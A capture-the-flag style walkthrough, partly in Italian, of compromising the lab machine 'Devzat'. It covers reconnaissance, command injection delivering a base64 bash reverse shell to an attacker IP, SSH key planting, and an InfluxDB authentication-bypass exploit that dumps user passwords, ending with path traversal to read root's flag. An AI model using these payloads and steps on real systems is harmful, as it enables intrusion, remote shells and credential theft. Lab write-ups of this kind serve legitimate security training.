- namp scan:
# Nmap 7.91 scan initiated Sat Oct 30 18:19:32 2021 as: nmap -sV -p- -T4 -oN sV_All 10.10.11.118
Nmap scan report for 10.10.11.118
Host is up (0.096s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41
8000/tcp open  ssh     (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=10/30%Time=617D716A%P=x86_64-pc-linux-gnu%r(N
SF:ULL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 30 18:23:07 2021 -- 1 IP address (1 host up) scanned in 215.88 seconds



- subdomain fuzzing:
ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://devzat.htb/ -H 'Host: FUZZ.devzat.htb' -fw 18

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://devzat.htb/
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.devzat.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 18
________________________________________________

pets                    [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4989/4989] :: Job [1/1] :: 171 req/sec :: Duration: [0:00:32] :: Errors: 0 ::



- dir listing:
$ffuf -w /usr/share/SecLists/Discovery/Web-Content/raft-small-files.txt:FUZZ -u http://pets.devzat.htb/FUZZ -fw 20

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://pets.devzat.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/raft-small-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 20
________________________________________________

.git                    [Status: 301, Size: 41, Words: 3, Lines: 3]



- Download locale del repo con gitdumper:
	/opt/GitTools/Dumper/gitdumper.sh http://pets.devzat.htb/.git/ pets



- main.go contains command injection because of variable "species" concatenated without casting:
func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	}
	return string(stdoutStderr)
}


-rev shell con command injection:
	local host in ascolto: nc -lnvp 5678
    genero base64 rev shell: $echo -n 'bash -i >& /dev/tcp/10.10.14.130/5678 0>&1' | base64
				YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMzAvNTY3OCAwPiYx

modifico richiesta inserendo rev shell e comandi per decodificarla ed eseguirla:
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 115
DNT: 1
Connection: close

{"name":"asd","species":"cat; echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMzAvNTY3OCAwPiYx | base64 -d | bash"}


-shell upgrade:
/usr/bin/script -qc /bin/bash /dev/null

-linpeas file transfer (non c'è netcat):
	local machine (nella cartella contenente linpeas): pyhton -m http.server 
	victim machine: wget http://10.10.14.130:8000/linpeas.sh 

-linpeas findings:
Sudo version
https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

Process:
root         980  0.0  4.5 873040 91888 ?        Ssl  14:53   0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root        1250  0.0  0.1 475324  3876 ?        Sl   14:53   0:00  _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086
root        1268  0.0  0.3 113372  7992 ?        Sl   14:53   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 79948f09fc79f350984786a081ef9f1a4b7217e1b40da5db00433d2358692f83 -address /run/containerd/containerd.sock
root        1289  0.0  2.2 406544 44384 ?        Ssl  14:53   0:11  _ influxd

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN      838/./petshop       
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8086          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8000                 :::*                    LISTEN      836/./devchat       
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -      


/etc/apache2/sites-available/default-ssl.conf:		#	 file needs this password: `xxj31ZMTZzkVA'.
/etc/debconf.conf:#BindPasswd: secret
/etc/nsswitch.conf:passwd:         files systemd
/etc/overlayroot.conf:#      $ MAPNAME="secure"; DEV="/dev/vdg"; PASSWORD="foobar"


- sudo non vulnerabile
- sulla macchina gira un docker -> port forwarding con macchina locale

PORTFORWARDING:
- aggiungere propria chiave pubblica *.pub al file authorized_keys, se non c'è crearne uno in .ssh e aggiugnere la chiave
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmXUBQYLpLfqHtqsQVgL++2fLL2M+HvihBfj+tYdhn10l0xP2vYYuv9fsFGUpUgzDJK6NnptBsxUoo0H0dOmsWGO3cHoUg0vFwZeG+fRNYAPojFHrVPhKOIsKziBydntip6EWgVIbwJUIiyRBL8gfZgFzpf481j+BsSzDz1+TANSCENyVHwtG9D3e58Bxrs5KRhZCGVwyaMuaH2YXH5/Sn0BMzerpahnPmVnkb7e9xINmctMhx7DNq1BzcKQkUpuxzpuEPvMCHBkGdN5JFnz4scjujcUNtRKgqpwUJqErpd2qEmY1ZJEgflSLfzyXCGjD+7ku/8Wj8v26+rWzE/R7xb46s/2aAIMw/5g0hiqLSIC4qcjbUJQ7T9vqGGOwzY/QwGvsspuiHHqOwAah/oCZXTqpNstdBw0WNhSARLU84U4M3kicuTEbAUUFfrYN8/Co/tTVhR/qp0y+AUHFxHF9DKWZ/qJZE1s39Luk931AA/qxMG8BXiop6UAlvGFkd5LyIxL7PxRssILxtXmGzy2Ivo/9oTHKCSQH4NtCmWDhM8c7lafnDQM0HlAE0QFMMDnRK9VXXgfsCvRs5BRAnkpJLRon229Klx1MRaVcwlXIheB3gWobaImgTAbHV/7UjgJFVz4/Sl4PCiNK6xydGqL1j7jtdTynSVCWpg85kjvu+ew== user@parrot" >> authorized_keys

- macchina locale fare portforwarding con ssh:
    ssh -L 8086:127.0.0.1:8086 patrick@devzat.htb

- con sessione aperta, da un altra tab nmap:
nmap -sV -sC -T4 -p 8086 127.0.0.1 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 19:13 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.017s latency).

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds

Versione vulnerabile:
https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

epxloit: python __main__.py 
  _____        __ _            _____  ____    ______            _       _ _   
 |_   _|      / _| |          |  __ \|  _ \  |  ____|          | |     (_) |  
   | |  _ __ | |_| |_   ___  __ |  | | |_) | | |__  __  ___ __ | | ___  _| |_ 
   | | | '_ \|  _| | | | \ \/ / |  | |  _ <  |  __| \ \/ / '_ \| |/ _ \| | __|
  _| |_| | | | | | | |_| |>  <| |__| | |_) | | |____ >  <| |_) | | (_) | | |_ 
 |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/  |______/_/\_\ .__/|_|\___/|_|\__|
                                                         | |                  
                                                         |_|                  
CVE-2019-20933

Insert ip host (default localhost): 
Insert port (default 8086): 
Insert influxdb user (wordlist path to bruteforce username): /usr/share/SecLists/Usernames/Names/names.txt
...
[v] admin

Host vulnerable !!!
Databases list:

1) devzat
2) _internal

Insert database name (exit to close): devzat
[devzat] Insert query (exit to change db): SELECT * FROM "user"
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "time",
                        "enabled",
                        "password",
                        "username"
                    ],
                    "name": "user",
                    "values": [
                        [
                            "2021-06-22T20:04:16.313965493Z",
                            false,
                            "WillyWonka2021",
                            "wilhelm"
                        ],
                        [
                            "2021-06-22T20:04:16.320782034Z",
                            true,
                            "woBeeYareedahc7Oogeephies7Aiseci",
                            "catherine"
                        ],
                        [
                            "2021-06-22T20:04:16.996682002Z",
                            true,
                            "RoyalQueenBee$",
                            "charles"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}



USER FLAG. catherine user password trovata. 
-cmd: su catherine, poi upgrade shell.

- linpeas di nuovo:
#)You_can_write_even_more_files_inside_last_directory
/var/backups/devzat-dev.zip
/var/backups/devzat-main.zip
/var/crash
/var/tmp

- ci sono 2 nuovi zip. estraendoli con ls -la si nota la differenza di dimensione del file commands.go, con diff vediamo cosa cambia:
    diff main/commands.go dev/commands.go

nuova funzione autenticata per leggere contentuto di un file arbitrario. Password hardcodata.
    if pass != "CeilingCatStillAThingIn2021?" 

la funzione gira sulla 8443:
catherine@devzat:/tmp$ ssh -l test localhost -p 8443

asdasd: /file ../../../../root/root.txt CeilingCatStillAThingIn2021?
[SYSTEM] 89b3366a505c4e85d715242341d112fd


